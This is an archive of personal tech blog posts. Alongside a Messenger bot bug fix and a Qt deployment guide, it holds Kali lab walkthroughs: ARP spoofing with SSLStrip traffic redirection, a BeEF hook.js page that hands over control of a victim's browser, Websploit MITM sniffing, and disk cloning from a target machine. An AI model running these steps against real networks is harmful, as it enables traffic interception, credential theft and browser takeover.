Tuesday, May 17, 2016

“(#100) No matching user found” - Facebook Messenger Bot Bug

On May 13th, I found that my Facebook Messenger bot failed to response some users, and as I read the error log of my webhook process, then got something like:
"error": {
    "message": "(#100) No matching user found",
    "type": "OAuthException",
    "code": 100,
    "fbtrace_id": “XXXXXXXXXXX”
}

Some Backgrounds

At this point, Facebook Messenger Bot is still new, which is reasonable to have some bugs. I’m using `Node.js for my webhook on Heroku, and I followed the tutorial provided by Facebook for setting up the bot.

Why?

Soon, I found this bug is discussed on Facebook Bug Page here. The problem is that Facebook decided to switch their encoding to use strings instead of ints for user & page IDs, which made the example code (template code) on Facebook official tutorial page fail to response users with string IDs.

Then?

Facebook send out notifications to the app developers saying:
On Tue May 17 format of user and page ids delivered via webhooks will change from an int to a string to better support default json encoder in js (that trims long ints). Please make sure your app works with string ids returned from webhooks as well as with ints.

Solution

I believe that Facebook will make the original code in the tutorial work pretty soon; however, there are people providing the solution online already. Here’s the template code that should work:
var express = require('express');
var bodyParser = require('body-parser');
var request = require("request");

var app = express();

const JSONbig = require('json-bigint')

app.set('port', (process.env.PORT || 5000));

app.use(express.static(__dirname + '/public'));
app.use(bodyParser.text({ type: 'application/json' }))

app.listen(app.get('port'), function() {
  console.log('Node app is running on port', app.get('port'));
});

var token = "<YOUR_TOEKN_HERE>";

function sendTextMessage(sender, text) {
  messageData = {
    text:text
  }
  request({
      url: 'https://graph.facebook.com/v2.6/me/messages',
      qs: {access_token:token},
      method: 'POST',
      json: {
        recipient: {id:sender},
        message: messageData,
      }
  }, function(error, response, body) {
    if (error) {
      console.log('Error sending message: ', error);
    } else if (response.body.error) {
      console.log('Error: ', response.body.error);
    }
  });
}

app.post('/webhook/', function (req, res) {

  var data = JSONbig.parse(req.body);
  messaging_events = data.entry[0].messaging;

  for (i = 0; i < messaging_events.length; i++) {

    event = data.entry[0].messaging[i];
    sender = event.sender.id.toString();

    if (event.message && event.message.text) {
      text = event.message.text;
      sendTextMessage(sender, text);
    }

  }

  res.sendStatus(200);

});
Make sure you’ve added body-parser, express, json-bigint, and request to your NPM.

Finally

My Bot, Ducky, is now working well and be public, please feel free to message him here: http://m.me/ducky.bot!


Thursday, May 5, 2016

Qt Mac Application Failed to Create Self-contained App Bundle (Qt Creator Build)

Recently, I encountered a problem in creating an app bundle using Qt Creator with Qt 5.6, so I posted my question with detail on StackOverflow here.

In this post, I am going to point out the places I got wrong, and some studies.

Scott

Scott is a friend of mine for years, and he is best programmer I’ve ever met in Taiwan. He helped me on this question, and I would like to quote his words here:

Do try to figure out what you did wrong before. Look at the RPATH, install names etc in your executable and update your StackOverflow question with those findings. Finding out what you did wrong is an important step in understanding a system. This makes your exercise of publishing apps on multiple platforms more meaningful.

@executable_path, @loader_path, @rpath

The first reason I couldn’t build the app build is that I didn’t fully understand the path names used on Mac, and here is my study of @executable_path, @loader_path, and @rpath.

  • @executable_path: the folder path of application’s executable
    • ex. /Applications/Foo.app/Contents/MacOS
    • useful for frameworks embedded inside the applications
  • @loader_path: the folder path of the related plug-in’s code
    • ex. /Library/Application Support/Foo/Plug-Ins/Bar.bundle/Contents/MacOS
    • useful for frameworks embedded inside plug-ins
    • availabe from Mac OS X 10.4
  • @rpath: instructs the dynamic linker to search a list of paths in order to locate the framework
    • no need to specify the “install path” using either @executable_path or @loader_path, but pass additional flags when building the host application (ex. -rpath @excutable/…/Frameworks or /Library/Frameworks)
    • availabe from Mac OS X 10.5

otool

The second reason I was stuck is that otool didn’t resolve @rpath names, so I was confused when it always returned me the same thing.

However, Scott wrote another version of otool that resolves the rpaths here. Here are the steps that demostrate the difference:

> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
        @rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
        @rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
        @rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
        /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
        /System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
        /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
        /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)

> otool-rpath bibi.app/Contents/MacOS/bibi
/Users/heron/Qt/5.6/clang_64/lib

> macdeployqt ./*.app -verbose=3 -always-overwrite -appstore-compliant

> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
        @rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
        @rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
        @rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
        /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
        /System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
        /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
        /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)

> otool-rpath bibi.app/Contents/MacOS/bibi
@executable_path/../Frameworks

macdeployqt

The last reason I failed to understand what’s going on is the output of macdeployqt, which confused me.

> macdeployqt bibi.app
File exists, skip copy: "bibi.app/Contents/PlugIns/platforms/libqcocoa.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/printsupport/libcocoaprintersupport.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqdds.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqgif.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqicns.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqico.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqjpeg.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtga.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtiff.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwbmp.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwebp.dylib"
WARNING:
WARNING: "bibi.app/Contents/Resources/qt.conf" already exists, will not overwrite.
WARNING: To make sure the plugins are loaded from the correct location,
WARNING: please make sure qt.conf contains the following lines:
WARNING: [Paths]
WARNING:   Plugins = PlugIns

However, in Scott’s solution, he gave following additional arguments:

  • -verbose=3: see how the rpaths are updated in details (Scott’s log)
  • always-overwrite: copy files even if the target file exists, so the first (Scott: I used “always-overwrite” to get predictable results after repeated testing, since the Qt frameworks would be copied into the app bundle.)
  • appstore-compliant: skip deployment of components that use private API (Scott: appstore-compliant was just for your convenience)

Test

Testing is one additional thing the made the original question harder to be solved: there’s no easy way to see if my app bundle works on the other machine without Qt installed.

Instead of asking friends to run the app, Scott mentioned that we can use `lsof at run-time.

> ps aux|grep bibi
heron           21610   0.0  0.5  2632680  40272   ??  S    Tue09PM   5:32.80 /Users/heron/Project/bibi/bibi/build-bibi-Desktop_Qt_5_6_0_clang_64bit-Release/bibi.app/Contents/MacOS/bibi
heron           39245   0.0  0.0  2434840    664 s003  R+    9:31AM   0:00.00 grep --color=auto bibi

> lsof -p 39183 | grep QtCore
bibi    21610 heron  txt      REG                1,4   6441676 168354669 /Users/heron/Qt-free/5.6/clang_64/lib/QtCore.framework/Versions/5/QtCore

After macdeployqt, the app bundle no longer needs to link to frameworks outside the bundle:

> ps aux|grep bibi
heron           39352   0.0  0.0  2435864    788 s003  S+    9:32AM   0:00.00 grep --color=auto bibi
heron           39315   0.0  0.8  2611176  63000   ??  S     9:32AM   0:00.68 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/MacOS/bibi

> lsof -p 39315 | grep QtCore
bibi    39315 heron  txt      REG    1,4   6017532 171823963 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/Frameworks/QtCore.framework/Versions/5/QtCore

Summary

I would say the biggest problem is that I didn’t know how to read @rpath, so Scott’s otool-rpath or lsof helps eventually.

Reference

Sunday, April 10, 2016

Kali Tool Series - dc3dd

“dc3dd is a patched version of GNU dd with added features for computer forensics” - from ForensicsWiki.

Comparison to GNU dd

While I was using dd, I found it’s hard to know how long will it take, and if the cloning was done completely without error. However, dc3dd fixes all these problems by providing:

  • on the fly hashing with multiple algorithms (MD5, SHA–1, SHA–256, and SHA–512)
  • progress reports
  • writing errors directly to a file

When and Why using dd or dc3dd

In the movies or TV series, we can see hackers plugin a USB disk then copy all the data out of the machine, and that’s the case we can use dd or dc3dd.

To be more specific, the flow is:

  • insert a Kali live usb disk into the target machine
  • do the Kali Forensics Boot
  • dd or dc3dd the disk of the target machine into a file on the Kali USB disk or another USB disk

Usage

I use VMs, so I won’t have the target machine in this example. However, you can pretend the disk I am going to clone (/dev/sda5) is the disk of the target machine. And, I am cloning the disk into a file stored in another USB disk.

First of all, list out the partitions of all the disks.

> fdisk -l

Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x7b852532

Device     Boot    Start      End  Sectors  Size Id Type
/dev/sda1  *        2048 40136703 40134656 19.1G 83 Linux
/dev/sda2       40138750 41940991  1802242  880M  5 Extended
/dev/sda5       40138752 41940991  1802240  880M 82 Linux swap / Solaris

Disk /dev/sdb: 3.8 GiB, 4026531840 bytes, 7864320 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x893a988d

Device     Boot Start     End Sectors  Size Id Type
/dev/sdb1         976 7864319 7863344  3.8G  b W95 FAT32

Pick the one you want to clone later, and here I am using the Linux swap (/dev/sda5), which is kind of meaningless but enough for practice purpose.

Then, locate the place you want to save your cloned disk image. Usually, you would want to use another USB disk since the machine may not belong to you, and what you want to do is to clone the disk, save in the USB disk, then take away. I will save the file on the /dev/sdb disk, which is mounted at /media/root/0909-B70D/disk-img/.

Start dc3dd:

> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256

dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed),      922,746,880 bytes
sector size: 512 bytes (probed)
   261455872 bytes ( 249 M ) copied ( 28% ),   33 s, 7.6 M/s                  

  • if: input disk location
  • of: output image location
  • hash: calculate the hash on the fly

Verification

After the cloning is completed, we can check if the file looks exactly the same as the original by comparing the hash code:

> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256

dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed),      922,746,880 bytes
sector size: 512 bytes (probed)
   922746880 bytes ( 880 M ) copied ( 100% ),  236 s, 3.7 M/s                 

input results for device `/dev/sda5':
   1802240 sectors in
   0 bad sectors replaced by zeros
   f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f (sha256)

output results for file `/media/root/0909-B70D/disk-img/cloned':
   1802240 sectors out

dc3dd completed at 2016-04-10 13:00:45 +0800

> file /media/root/0909-B70D/disk-img/cloned 
/media/root/0909-B70D/disk-img/cloned: Linux/i386 swap file (new style), version 1 (4K pages), size 225279 pages, no label, UUID=767f785e-d7fb-4b3c-9f8e-b02761db620e
> sha256sum /media/root/0909-B70D/disk-img/cloned 
f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f  /media/root/0909-B70D/disk-img/cloned

As you can see, the swap file is copied, and the hashs are the same (f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f).

Kali Forensics Boot

By doing the Kali Forensics Boot, one can gain lots of benefits from being silent. That is, the Kali Forensics Boot provides following features:

  • the internal hard disk is never touched
  • auto-mounting of removable media is disabled

Reference

Wednesday, April 6, 2016

Kali Tool Series - SSLStrip

Refer to “How does SSLstrip work?” on StackExchange: SSLStrip is a type of MitM attack that forces a victim’s browser into communicating with an adversary in plain-text over HTTP, and the adversary proxies the modified content from an HTTPS server. To do this, SSLStrip is “stripping” https:// URLs and turning them into http:// URLs.
> sslstrip -h

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

Overview

We will use ARP Spoofing in order to obtain the victim’s traffic, which means that the traffic will go through our Kali machine then pass back to the victim or the server he/she is communicating with. Then, we will be listening on port 80, the basic HTTP protocol port. All the traffic of port 80 will be routed to SSLStrip, and SSLStrip will handle rest of the HTTPS traffics.
The expected results was that the attacker will be able to read the requests between the victim and the HTTPS websites he/she is visiting, which may contains valuable cookies or passwords. However, in my experiment, SSLStrip crashed, and it’s seems that this method is out of date.

Find the Gateway IP

> route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.63.2    0.0.0.0         UG    0      0        0 eth0
0.0.0.0         192.168.63.2    0.0.0.0         UG    1024   0        0 eth0
192.168.63.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
192.168.63.2    0.0.0.0         255.255.255.255 UH    1024   0        0 eth0

or,
> netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         192.168.63.2    0.0.0.0         UG        0 0          0 eth0
0.0.0.0         192.168.63.2    0.0.0.0         UG        0 0          0 eth0
192.168.63.0    0.0.0.0         255.255.255.0   U         0 0          0 eth0
So, the Gateway IP is 192.168.63.2 in my case.

Find the Victim IP

As I run Kali in VM, I will let the victim be a Ubuntu server, which is also another VM on my machine. I run this on my Ubuntu:
> ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:4f:5f:5b
          inet addr:192.168.63.152  Bcast:192.168.63.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe4f:5f5b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:118 errors:0 dropped:0 overruns:0 frame:0
          TX packets:81 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:15530 (15.5 KB)  TX bytes:14538 (14.5 KB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:16 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:1184 (1.1 KB)  TX bytes:1184 (1.1 KB)
That is, the victim IP is 192.168.63.152. If you have no access of the victim machine, you can use commands like nmap -sP 192.168.63.0/24 to search.

IP Routing

We are going to redirect Kali’s inbound traffic from 80 to the port SSLStrip is running on (let’s use 5050 here).
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5050
To check if the routing rule is set:
> iptables -L -vt nat
Chain PREROUTING (policy ACCEPT 100 packets, 13501 bytes)
 pkts bytes target     prot opt in     out     source               destination
   16   960 REDIRECT   tcp  --  any    any     anywhere             anywhere             tcp dpt:http redir ports 5050
… 
If you want to clean up some mess and reset, here’s the way to clear all PREROUTING rules:
for i in $( iptables -t nat --line-numbers -L | grep ^[0-9] | awk '{ print $1 }' | tac ); do iptables -t nat -D PREROUTING $i; done

IP Forwarding

Since we are going to issue ARP Spoofing later, we have to enable IP forwarding first. So, whenever the Kali machine recieves packages, it will send them to the proper destination. We call this MitM (Man in the Middle).
> echo 1 > /proc/sys/net/ipv4/ip_forward
> cat /proc/sys/net/ipv4/ip_forward # check
1

ARP Sproof

Now, in order to let the traffic flow through our Kali machine (Mitm), we need ARP Sproof. The syntax is:
> arpspoof -i interface -t target_IP -r gateway_IP
In our case:
> arpspoof -i eth0 -t 192.168.63.152 -r 192.168.63.2
0:c:29:80:9a:85 0:50:56:e9:3:c 0806 42: arp reply 192.168.63.156 is-at 0:c:29:5a:28:9e
0:c:29:80:9a:85 0:c:29:5a:28:9e 0806 42: arp reply 192.168.63.2 is-at 0:50:56:e9:3:c
… 
The process is blocking, and we should keep it running.

SSLStrip

Start SSLStrip on port 5050 (or any port you like, just make sure that matches the one we used in IP Routing).
> sslstrip -l 5050

sslstrip 0.9 by Moxie Marlinspike running...

Victim Browse HTTPS Websites

Since my victim only has Command Line Interface, so I am using lynx as my browser.
> lynx http://www.paypal.com
On Kali’s Wireshark, we can tell that ARP Spoofing is working because all duplicated packages are shown. (In the screenshot, the upper part happened when ARP Spoofing was off, and all the traffics looks normal. The lower part happened when ARP Spoofing was on, we can see that Kali recieved all the traffic to/from victim, 192.168.63.152, then passed through.)


SSLStrip Result

SSLStrip crashed right after the user is about to connect the HTTPS website. I’ve tried to get the latest SSLStrip 0.9.2, but it crashes in the same way. And, I also found the other users are suffering from this issue as well: sslstrip on non hsts site error #17 and Execptions in twisted #15.
There’s the error:
sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
  File "sslstrip.py", line 105, in main
    reactor.run()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1192, in run
    self.mainLoop()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1204, in mainLoop
    self.doIteration(t)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/epollreactor.py", line 396, in doPoll
    log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 627, in _doReadOrWrite
    self._disconnectSelectable(selectable, why, inRead)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
    selectable.connectionLost(f)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 484, in connectionLost
    self._commonConnection.connectionLost(self, reason)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 298, in connectionLost
    protocol.connectionLost(reason)
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 474, in connectionLost
    self.handleResponseEnd()
  File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
    HTTPClient.handleResponseEnd(self)
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 485, in handleResponseEnd
    self.handleResponse(b)
  File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 133, in handleResponse
    self.client.write(data)
  File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 962, in write
    raise RuntimeError('Request.write called on a request after '
exceptions.RuntimeError: Request.write called on a request after Request.finish was called.
The experiment didn’t work, and I may come back to this if I found something new.

Reference

DoS v.s. DDoS

People like to mix up DoS with DDos, which are similiar but different. By refering to Wikipedia, we got:

DoS: A denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.

DDoS: A distributed denial-of-service (DDoS) is where the attack source is more than one, often thousands of, unique IP addresses.

Difference

DoS is launched by one machine; on the contrast, DDoS is launched by distributed machines.

Refer to DDoS attack - Distributed Denial of Service, we got: “A Denial of Service (DoS) attack is different from a DDoS attack. The DoS attack typically uses one computer and one Internet connection to flood a targeted system or resource. The DDoS attack uses multiple computers and Internet connections to flood the targeted resource. DDoS attacks are often global attacks, distributed via botnets.”

Who Mixed Them Up?

I’ve been seeing this mistake for a long time, people keep mixing up these two names. If the attack was only launched on one machine, then it’s called DoS instead of DDoS. Some examples of people who got it wrong here:

Why This Matters?

DoS is easy to launch, and easy to be defended. On the other hand, DDoS is always a big threat in current world since victims have a difficult time distinguishing the bad guys from the large amount of users. DDoS is a serious problem that we should be focus on (see Digital Attack Map hosted by Google); and those who claim what they were doing were DDoS attacks but actually DoS attacks should stop delivering wrong information to the public.

How To Launch DDoS Then?

Too bad, I’ve never launched a DDoS attack before, which I believe it’s illegal as well. However, followings are the information about it if you’re interested in knowing more. And, one should NOT apply them on real machines/networks unless he/she fully understand the consequences.

First of all, you need a BotNet, or a distributed machines under your control. Bad guys buy the BotNet on Black Market. Those machines are usually the ones had been hacked, so attackers can control them via the backdoor left on the machine.

Then, the attacker will ask all the bot machines send requests to the victim. The requests will be in a high frequency, and make the victim couldn’t handle all of them (run out of memory or CPU), eventually the service freezed. UFONet is one tool I found online that is designed to test/launch DDoS attacks written in Python.

Monday, April 4, 2016

Keyword Spotting for Controlling Window Background Color

This is a small testing program that uses both CMUSphinx and GTK+ to demonstrate keyword spotting (KWS) algorithm.

KWS is the technique used to detect the keyword at anytime. Yes, this is the technique applied for “Okay, Google” and “Hey, Siri”. Whenever the keyword is heard by the machine, some callback function will be fired up.

History

  • Originally, Hidden Markov Model system
  • Google, 2014, Deep Neural Network (DNN), demos outperformance to HMM system
  • Google, 2015, Convolutional Neural Networks (CNNs), demos outperformance to DNN
    • ignore input topology, as the (fixed) input can be presented in any order without affecting the performance of the network
    • not explicitly designed to model translational variance within speech signals, which can exist due to different speaking styles / capture translational invariance with far fewer parameters by averaging the outputs of hidden units

Tools

CMU Sphinx Project by Carnegie Mellon University

  • CMU LTI, Language Technology Institute
  • Designed to be adopted on different platforms including iOS, Android, Raspberry Pi, etc.
  • License: BSD-style (nice!)

Raspberry Pi 2 – Speech Recognition on device

  • Upload word list to http://www.speech.cs.cmu.edu/tools/lmtool-new.html
  • Link .lm and .dict file, command: pocketsphinx_continuous -inmic yes -lm 0730.lm -dict 0730.dic -samprate 16000/8000/48000

My Code

Github link: https://github.com/heronyang/kws-color-demo

Components

In main.c, the program fires up a thread for handling GUI jobs right after it started. Then, it started to setup pocketsphinx and call recognize_from_microphone or recognize_from_file for the audio input. Since argc/argv is passed into the settings, the user can specify the dictionary file or log file as what is written in run.sh.

Run

> ./run.sh

Demo


Friday, April 1, 2016

Kali Tool Series - BeEF

“BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.”

How It Works

Basically, first start the BeEF server, then let the victim run hook.js on his/her browser, and we can know information of victims’ machines or control them.

Start BeEF Server

> beef-xss 
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
… 
Then, open the browser with URL http://127.0.0.1:3000/ui/panel on Kali, and you’ll see the BeEF Control Panel.

Let Victim Run hook.js

I’m not including the strategies of letting people to run hook.js in real world, which I believe some social engineering is involved. Instead, I am running a simple server on Kali using another port other than 3000 (used by BeEF Server), then let the victim open the webpage which has hook.js embedded.

Setup the Web Page
Usually, some frauding may be involved here, but I am ignoring them for study purpose. What I built now is barely a blank page with label “hello”. Save following page as index.html somewhere on Kali.
<!DOCTYPE html>
<html>
<head>
</head>
<body>
    <h1>hello</h1>
    <script src="http://192.168.63.155:3000/hook.js"></script>
</body>
</html>
192.168.63.155 is the IP of Kali, which is a local IP, so only other machines under the same local network can access later on.

Setup the Web Server
I am using Python Simple HTTP Server, so:
> python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
And, the web server will start and be listening to port 8000.

Victim Visit
As Kali is running in a VM, I visit the site just set on my host machine (Mac). Simply opening http://192.168.63.155:8000 will work.

Control the Victim

On Kali, you can see a new item popped up on the lefthand list. You can start to read the victim’s information or control it.

What You Can Do

On the command tab in the BeEF Control Panel, you can see a list of action you can do to the victim. Well, in my experiment, quite a lot of them don’t work, possibly because the browsers had fixed the security flaw, or just because the BeEF code wasn’t update to date.
On BeEF Cantrol Panel, different color circle next to the actions represent different status:
  • green : works on the target; invisible.
  • orange : works on the target; visible.
  • grey : must yet be verified if it works.
  • red : does not work on the target.
Here, I will list some actions I found working.

Play Sound

This command is to play a sound on the target machine by giving the sound URL. I randomly searched on www.findsounds.com, and got this link:
http://princezze.free.fr/sounds/laugh.MP3
Put it onto the panel, then it works.


iFrame Event Logger

This one allows the attacker to open website by providing the URL. It won’t work on the sites that check its origin. That is, if you try to open Google.com, then you will get following error in the victim’s browser console.
[Error] Refused to display 'https://www.google.com/?gws_rd=ssl' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'.
But, it’s fine if you open other simple websites like http://www.heron.me/.



Excute JavaScript Code

This is the point. As the attack was trigger by the user when he/she runs hook.js, all the further actions are done by passing JavaScripts code from the attackers to the victim. So, “excuting JavaScript code” on the attacker’s demand will bring the maximun flexiblilty.




Other

Some commands don’t show the result on the control panel, or they are showed in somewhere I couldn’t find. So, I switched to my favorite Terminal, and found the results.
They are saved in a sqlite .db file, by using the sqlite tool, we can access the result:
> cd /var/lib/beef-xss
> sqlitebrowser beef.db
Check the core_results table for the results.


Reference

Wednesday, March 30, 2016

Kali Tool Series - Websploit

Although it seems that there are other more handly tools for web exploits other than Websploit, it still interests me by having a similiar inferface as Metasploit.

To Start

> websploit

 __    __    ___  ____    _____ ____  _       ___  ____  ______
|  |__|  |  /  _]|    \  / ___/|    \| |     /   \|    ||      |
|  |  |  | /  [_ |  o  )(   \_ |  o  ) |    |     ||  | |      |
|  |  |  ||    _]|     | \__  ||   _/| |___ |  O  ||  | |_|  |_|
|  `  '  ||   [_ |  O  | /  \ ||  |  |     ||     ||  |   |  |
 \      / |     ||     | \    ||  |  |     ||     ||  |   |  |
  \_/\_/  |_____||_____|  \___||__|  |_____| \___/|____|  |__|


                --=[WebSploit FrameWork
        +---**---==[Version :2.0.5 BETA
        +---**---==[Codename :We're Not Crying Wolf
        +---**---==[Available Modules : 19
                --=[Update Date : [r2.0.5-000 2.3.2014]



wsf >

Show available modules

wsf > show modules

Web Modules                     Description
-------------------             ---------------------
web/apache_users                Scan Directory Of Apache Users
web/dir_scanner                 Directory Scanner
web/wmap                        Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma                         PHPMyAdmin Login Page Scanner
web/cloudflare_resolver         CloudFlare Resolver


Network Modules                 Description
-------------------             ---------------------
network/arp_dos                 ARP Cache Denial Of Service Attack
network/mfod                    Middle Finger Of Doom Attack
network/mitm                    Man In The Middle Attack
network/mlitm                   Man Left In The Middle Attack
network/webkiller               TCP Kill Attack
network/fakeupdate              Fake Update Attack Using DNS Spoof
network/arp_poisoner            Arp Poisoner


Exploit Modules                 Description
-------------------             ---------------------
exploit/autopwn                 Metasploit Autopwn Service
exploit/browser_autopwn         Metasploit Browser Autopwn Service
exploit/java_applet             Java Applet Attack (Using HTML)


Wireless / Bluetooth Modules            Description
-------------------             ---------------------
wifi/wifi_jammer                Wifi Jammer
wifi/wifi_dos                   Wifi Dos Attack
wifi/wifi_honeypot              Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod         Bluetooth Ping Of Death Attack

Cases

Here, I am going to try some modules in Websploit. And, the target will be my own Metasploitable2 virtual machine. Make sure you don’t try any actions described here on a running machine that doesn’t belong to you.

Scan Directories

We are scanning the directories under the target machine using HTTP requests with bruteforce. As far as I know, DirBuster is also famous for doing this job. And, by doing this action, it’s easy for the target machine to be noticed since lots of invalid requests will be sent out in a short period.

wsf > use web/dir_scanner
wsf:Dir_Scanner > show options

Options          Value
---------       --------------
TARGET          http://google.com

wsf:Dir_Scanner > set target http://192.168.63.156
TARGET =>  192.168.63.156

wsf > run
…

However, I don’t think the program does a good job as it doesn’t print out the result in the same time, the user might have to wait util it’s completed. And, it usually takes a long time.

Man in the Middle

Man in the Middle is an interesting attack. The attacker stay silent and steal the network traffic from the victim, then pass it over. That is, the victim may not notice that his/her traffic is totally monitored by the attacker.

Attacker side:

wsf > use network/mitm
wsf:MITM > show options

Options          Value                           RQ      Description
---------       --------------                  ----    --------------
Interface       eth0                            yes     Network Interface Name
ROUTER          192.168.1.1                     yes     Router IP Address
TARGET          192.168.1.2                     yes     Target IP Address
SNIFFER         driftnet                        yes     Sniffer Name (Select From Sniffer List)
SSL             true                            yes     SSLStrip, For SSL Hijacking(true or false)


Sniffers         Description
------------    --------------
dsniff           Sniff All Passwords
msgsnarf         Sniff All Text Of Victim Messengers
urlsnarf         Sniff Victim Links
driftnet         Sniff Victim Images

wsf:MITM > set TARGET 192.168.63.156
TARGET =>  192.168.63.156
wsf:MITM > set ROUTER 192.169.63.1
ROUTER =>  192.169.63.1
wsf:MITM > set SNIFFER urlsnarf
SNIFFER =>  urlsnarf
wsf:MITM > run
